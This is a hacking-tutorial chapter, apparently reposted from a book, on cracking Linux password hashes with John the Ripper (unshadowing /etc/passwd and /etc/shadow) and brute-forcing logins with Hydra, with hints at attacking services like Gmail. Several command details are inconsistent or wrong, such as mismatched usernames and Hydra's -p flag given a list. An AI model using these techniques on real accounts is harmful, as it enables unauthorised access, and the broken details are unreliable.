Cracking Passwords
Passwords. If only we know everyone else’s, and no one knew our own.
The end user security in the hierarchy of information processing, the user, primarily keeps data safe on a computer using a password. But there just as there is a tool to pick any lock, there is a tool to crack (almost) any password. In this section, we will highlight two very potent and very modern tools that hackers use to find passwords.
6.1 Cracking Passwords with John the Ripper
Let me introduce you to John the Ripper. This free password cracking tool was initially built for the Unix operating system. It works so well that it is now available on over 15 different platforms.
John Ripper is a password testing and breaking app that combines various cracking techniques (or packages) that autodetect password hash types and even has a customized cracker. It is a formidable tool to use or try to break many types of encrypted password types used on Unix-based operating systems. Extendability features such as MD4-based passwords and hashes stored in LDAP or MySQL makes John the Ripper the most popular tool used by blackhat and whitehat hackers.
Step 1: Preparation
The Linux operating system stores passwords in a shadow file inside the /etc./ folder. For this exercise, we are going to create a folder, save it in that location, then attempt to crack it using John the Ripper. We will create a new user
‘admin’ for the Linux Kali system with a simple password ‘password123.'
root@kali:~# adduser happy Adding user `happy' ...
Adding new group `happy' (1001) ...
Adding new user `happy' (1000) with group `admin...
Creating home directory `/home/admin' ...
Copying files from `/etc/skel' ...
Enter new UNIX password: Retype new UNIX password:
passwd: password updated successfully
Changing the user information for happy
Enter the new value, or press ENTER for the default Full Name []:
Room Number []:
Work Phone []:
Home Phone []:
Other []:
Is the information correct? [Y/n] y root@kali:~#
Step 2: Unshadowing password
Next, we will use the unshadow command to combine the data inside the /, etc/shadow and /etc/password to end up with a single file with the password and username details of the user account we will attempt to crack using John the Ripper. We will name the file usr.
root@kali:~# unshadow
Usage: unshadow PASSWORD-FILE SHADOW-FILE
root@kali:~# unshadow /etc/passwd /etc/shadow > ~/usr
Step 3: Crack the password with a wordlist
The new file will be cracked by John the Ripper. We will use the password list that comes with the tool on Kali Linux. The password is list stored in the directory:
usr/share/john/password.lst
In the future, you will be able to generate your wordlist to use to crack a user password. Enter the following command:
root@kali:~# john --wordlist=/usr/share/john/password.lst ~/usr
Loaded 2 password hashes with 2 different salts (sha512crypt [64/64]) Password123 (admin)
guesses: 1 time: 0:00:00:21 DONE (Wed Jan 11 07:21:08 2017) c/s: 300 trying: sss
Use the "--show" option to display all of the cracked passwords reliably root@kali:~#
John the Ripper was able to crack the hash to find the password ‘password123’ for the user ‘admin.' This was possible because the password ‘password123’ was one of the possible passwords in the Passwords list. If the actual password were not on the list, the crack would have failed.
Step 4: Cracking a password without a wordlist
It is possible to use John the Ripper to crack a password without providing a list of possible passwords. As a budding hacker, you will want to try and see if this method actually works.
On your Kali terminal, enter the following code to remember:
root@kali:~# john ~/filename
The /filename in the code demo above represents the file where the user password is stored.
According to the documentation on http://www.openwall.com/john/doc/MODES.shtml, John the Ripper will try the ‘single crack’ mode first and if it does not work, use an available wordlist with rules, and if this is not successful, switch to ‘incremental’ mode.
I should point out that your installation of Kali Linux comes with another password cracking tool called Ncrack. To find it, navigate to Kali Linux’s list of tools by clicking on Application > Password attacks. Ncrack is right there. It is described as a high-speed network authentication cracking tool that was designed to help companies secure their networks proactively by testing all their network and network devices for poor passwords. You can read more about this tool on http://tools.kali.org/password-attacks/ncrack.
6.2 Cracking Passwords with Hydra
Best known as ‘THC-Hydra’,
hydra is a powerful online password attack tool that uses brute force and other password cracking combinations on live internet services such as http, https, smtp, snmp, ssh, smb, and telnet among others. This tool supports over 30 protocols including those secured with SSL and brute forces services using wordlists and userlists.
Hydra has four working modes:
1. One username One password mode.
2. Userlist and one password mode.
3. One username and password list mode.
4. Userlist and password list mode.
What makes Hydra one-of-a-kind password cracking tool is that it is a fast connection bruteforcer that is also flexible with tons of new modules always available to add with ease. There are lots of password lists out there that a hacker such as yourself will get familiar using, you can find them with a simple Google search.
6.2.1 Understanding Hydra Command
For a brute force kind of password cracking to work, no matter which tool you use, you need to have a list of possible passwords that the software will use. You can also use a list of passwords that comes with John the Ripper - it is pretty much the same thing.
You can find Hydra on Kali Linux by going to Applications >Password Attacks > Online Attacks > Hydra. When you click it, it should open on the terminal. Alternatively, you can easily use the command hydra on the terminal to initiate this tool.
If Hydra is not pre-installed on your version of Kali Linux, you can set it up by entering:
apt-get install hydra-gtk
Hydra uses the following command for a typical basic attack:
Hydra -l username -p passwordlist target
The username is a single username such as “user” or “admin” or can be a list of usernames. The passwordlist is typically a text file that contains the possible passwords to match the username, and the target is the service or host to that authenticates the credentials. The target can be an IP address and port number or a specific web form field.
You can check the passwords that come with Kali Linux default in the directory /usr/share/wordlists by first going to the directory:
root@kali: ~# cd /usr/share/wordlists
Then listing the contents of the directory:
root@kali: /usr/share/wordlists# ls
Dirb fasttrack.txt metasploit-jtr w3af.txt
Dirbuster fern-wi-fi metaspoilt-pro sqlmap
Dnsmap.txt nmap.lst wfuzz.txt
To use hydra to crack a password, use the command format illustrated in the previous page, replacing the placeholders username, passwordlist, and target with actual information. For instance, an attack would be structured like this:
6.2.2 Using Hydra on web forms
There is a level of complexity in using Hydra on web forms because you have to provide more information parameters that the form needs. However, the syntax is pretty much the same as above.
To use hydra on a web form, you will need the URL, form parameters, and failure string instead of the IP. This means your command would be structured like this:
root@kali: /usr/share/wordlists# hydra -l admin -p
/usr/share/wordlists/mypasswords.txt 192.168.0.0 8080
Hydra -l username -p passwordlist <url>:<formparameters>:<failure string>
Unfortunately, using Hydra on a webform is beyond the scope of this book. We could go into detail with demonstrations and examples, but this tool alone would need an entire book to cover how you can use it to hack into Facebook, Gmail, or any other formidable online service.
The most critical of the parameters required to crack an online web form using Hydra is the failure string. This is the text that the form returns when Hydra attempts incorrect username and, or password combinations. This information is vital because Hydra needs to know when an attempt fails so it can move on to the next attempt.
You can read more and discover the many features, and practical examples of using Hydra and its advanced features on the Kali Linux web page here:
http://tools.kali.org/password-attacks/hydra
Comments
Post a Comment